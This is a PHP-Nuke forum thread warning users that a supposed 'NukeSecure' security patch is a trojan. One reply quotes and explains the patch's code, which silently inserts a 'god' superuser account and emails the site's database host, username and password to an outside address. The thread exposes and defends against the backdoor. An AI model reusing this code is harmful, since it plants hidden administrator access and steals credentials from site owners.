|
- Readme First! -
Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 144 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
|
 Anonymous writes "Hi Nukers
Some punk claiming to be from "NukeSecure" has submitted a news article saying that supposidly people can gain access to your site using admin.php
THIS IS A SCRIPT KIDDIE. DO NOT DOWNLOAD OR IMPLEMENT THAT FILE
After checking the code through, I found code that not only creates an admin account - superuser admin account - with a pre-defined username and password, but it then emails this guy with your site URL, and your database username and password.
AI"
|
|
Posted on Tuesday, July 08 @ 12:34:15 CEST by [RETIRED]Raven |
|
|
|
|
| |
|
Average Score: 5
Votes: 1
|
|
|
|
|
|
|
| | The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
| No Comments Allowed for Anonymous, please register | | | | |
Re: Security Warning (Score: 1)
by chatserv on Tuesday, July 08 @ 13:28:03 CEST
(User Info | Send a Message) http://nukeresources.com | Since most of you know i often provide a file so that users can manually perform the fixes and seeing as NukeSecure forgot to do so i will do it for him, not only that, i'll even explain what each "fix" does so let's go:
if ($nuke == "secure") {
$result = mysql_query("INSERT INTO nuke_authors VALUES ('god', 'God', '', '', '9984b7b73df597078be8085131ef5fc1', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,'')");
if (!$result) { echo "- data insertion error.
"; } else { echo "- data inserted.
"; }
}
This particular "fix" attempts to insert an admin with God access, of course since it won't be you and the password is encrypted only the author of this "fix" will be able to access this brand new admin account, sweet huh?
Find:
.""
Replace with:
.""
The inserted name value will allow this new admin with additional tools for his hacking tools, clever? umm, let me think on that
one for a bit
include ("config.php");
mysql_select_db($dbname) or die("Could not select the database: " . $db[db]);
$result=mysql_query("SELECT * FROM ".$prefix."_config");
while ($user = mysql_fetch_array($result)) {
{
{
$AdminMessage .="".$user["sitename"].",".$user["startdate"].",".$user["adminmail"].",".$user["notify_email"]."
";
$AdminMessage .="$dbhost
";
$AdminMessage .= "user:$dbuname
";
$AdminMessage .= "$dbpass
";
$AdminMessage .= "dname:$dbname
";
mail("nukesecure@yahoo.co.uk", "".$user["nukeurl"]."", "$AdminMessage", "From:");
}
}
}
This insert will mail the admin login info to the author of the "fix", essential part of any good "security fix", no patch should be missing this beauty
Last but not least, the credits:
/* fixed by nukesecure */
Oh it was fixed alright, no doubts about that one. |
| | | | |
Re: Security Warning (Score: 1)
by Raven on Tuesday, July 08 @ 14:01:39 CEST
(User Info | Send a Message) http://ravenphpscripts.com | | Just in case his email addy was real, I contacted Yahoo and they are taking appropriate steps also. Wonder if we should contact SF? |
| | | | |
Re: Security Warning (Score: 1)
by Olipro on Wednesday, July 09 @ 08:18:29 CEST
(User Info | Send a Message) | | makes me feel like setting a trap, anyhow, his script wouldn't work, i created a pic of the day mod and subsequently added a new row to the authors section |
| | | | | |
